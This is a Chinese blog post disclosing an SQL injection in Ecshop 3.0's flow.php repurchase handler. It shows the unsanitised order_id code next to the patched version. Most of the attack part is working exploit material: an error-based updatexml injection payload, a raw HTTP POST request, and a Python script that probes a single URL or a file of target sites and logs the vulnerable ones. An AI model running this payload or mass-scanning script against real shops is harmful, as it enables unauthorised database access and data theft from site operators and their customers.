Ecshop 3.0 flow.php SQL注射漏洞

关于这个漏洞是新版本修复了。下载了古老的版本对比才发现的。只是怎么也没有想到ecshop也会犯这种低级的错误。
好吧,文件flow.php

elseif ($_REQUEST['step'] == 'repurchase') {
    include_once('includes/cls_json.php');
    $order_id = strip_tags($_POST['order_id']);
    $order_id = json_str_iconv($order_id);
    $user_id = $_SESSION['user_id'];
    $json  = new JSON;
    $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
    if (!$order) {
        $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        die($json->encode($result));
    }

    $db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);
    $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
    $result = array('error' => 0, 'message' => '');
    foreach ($order_goods as $goods) {
        $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
        if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
            $result = false;
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        }
    }
    die($json->encode($result));
}

这里的参数并非是新版的$order_id = intval($_POST['order_id']);

elseif ($_REQUEST['step'] == 'repurchase') {
    include_once('includes/cls_json.php');
    $order_id = intval($_POST['order_id']);
    $order_id = json_str_iconv($order_id);
    $user_id = $_SESSION['user_id'];
    $json  = new JSON;
    $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
    if (!$order) {
        $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        die($json->encode($result));
    }

    $db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);
    $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
    $result = array('error' => 0, 'message' => '');
    foreach ($order_goods as $goods) {
        $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
        if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
            $result = false;
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        }
    }
    die($json->encode($result));
}

继续查看json_str_iconv

function json_str_iconv($str)
{
    if (EC_CHARSET != 'utf-8')
    {
        if (is_string($str))
        {
            return addslashes(stripslashes(ecs_iconv('utf-8', EC_CHARSET, $str)));
        }
        elseif (is_array($str))
        {
            foreach ($str as $key => $value)
            {
                $str[$key] = json_str_iconv($value);
            }
            return $str;
        }
        elseif (is_object($str))
        {
            foreach ($str as $key => $value)
            {
                $str->$key = json_str_iconv($value);
            }
            return $str;
        }
        else
        {
            return $str;
        }
    }
    return $str;
}

这里显然没过滤了 再看看上面的SQL语句 居然没有单引号包含 这样就能直接注射了
POST提交一下内容到 http://localhost/flow.php?step=repurchase

order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#

1
一个post包

POST /flow.php?step=repurchase HTTP/1.1
Host:?127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ECS[visit_times]=2; ECS_ID=1998571d464009d432a17951ee5852104eba8b75
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
 
order_id=1*

附上野生payload一枚

import requests as req
import optparse

def poc(url):
    xode='MySQL server error report:Array'
    url=url+'/flow.php'
    try:
        rgg=req.get(url)
        
    except:
        return '[-]Getting '+url+' Wrong'
        
    if rgg.status_code !=200:
         return '[-]'+url+' Wrong'
  
    geturl=url+'?step=repurchase'
    payload='order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#'
    a=req.post(geturl,data=payload)
  
    if a.status_code==200:
   
        if xode in a.text:
            return 2
        else:
          
            return '[-]'+url+'Exploiting Fail'
            
    else:
        return '[-]'+url+' Fail!!'

def ifhttp(url):
    if 'http://' in url:
        return url
    else:
        return 'http://'+url
def r(filename):
    try:
        ff= open(filename).readlines()
    except:
        print'[-] The file is not exist'
        exit(0)
    return ff
def w(url):
    f=open('Res.txt','a+')
    f.write(url+'\n')
    f.close
if __name__=='__main__':
    parser = optparse.OptionParser('usage%prog -u <url> -r <file>')
    parser.add_option('-u', dest='url', type='string', help='the website')
    parser.add_option('-r', dest='file', type='string', help='the file')

    (options, args) = parser.parse_args()
    url = options.url
    
    f=options.file
    if options.url == None and f==None:
        print(parser.usage)
        exit(0)
    if options.url!=None:
        url=ifhttp(url)
        r=poc(url)
        if r==2:
            print '[+]'+url+' succeed'
            w(url)
        else:
            print r
    if f!=None:
         for fff in r(f):
             b=fff.strip('\n')
             r=poc(ifhttp(b))
             if r==2:
                print '[+]'+b+' succeed'
                w(b)
             
             else:
             
                 print r
               

发表评论